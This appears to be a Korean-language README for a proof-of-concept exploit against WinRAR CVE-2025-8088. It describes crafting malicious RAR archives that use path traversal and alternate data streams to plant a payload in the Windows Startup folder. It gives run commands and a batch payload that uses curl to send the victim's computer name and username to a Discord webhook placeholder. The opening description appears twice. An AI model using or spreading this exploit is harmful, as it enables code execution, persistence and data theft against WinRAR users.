
WinRAR 취약점(CVE-2025-8088)에 대한 개념 증명 익스플로잇으로, 버전 7.12 이하에 영향을 미칩니다. 이 도구는 경로 탐색과 함께 대체 데이터 스트림(ADS)에 페이로드를 포함하는 악성 RAR 아카이브를 생성하여 잠재적으로 임의 코드 실행으로 이어질 수 있습니다.
WinRAR 취약점(CVE-2025-8088)에 대한 개념 증명 익스플로잇으로, 버전 7.12 이하에 영향을 미칩니다. 이 도구는 경로 탐색을 통해 Alternate Data Streams(ADS)에 페이로드를 포함하는 악성 RAR 아카이브를 생성하여 잠재적으로 임의 코드 실행을 유발합니다.
# 저장소 클론
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088
# 의존성 설치
pip install reportlab
# 익스플로잇 실행
python CVE-2025-8088.py
Discord 웹훅을 호출하도록 페이로드 편집:
# 스크립트의 PAYLOAD 변수 교체:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""
YOUR_DISCORD_WEBHOOK_URL을 실제 웹훅 URL로 바꾸세요.
AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\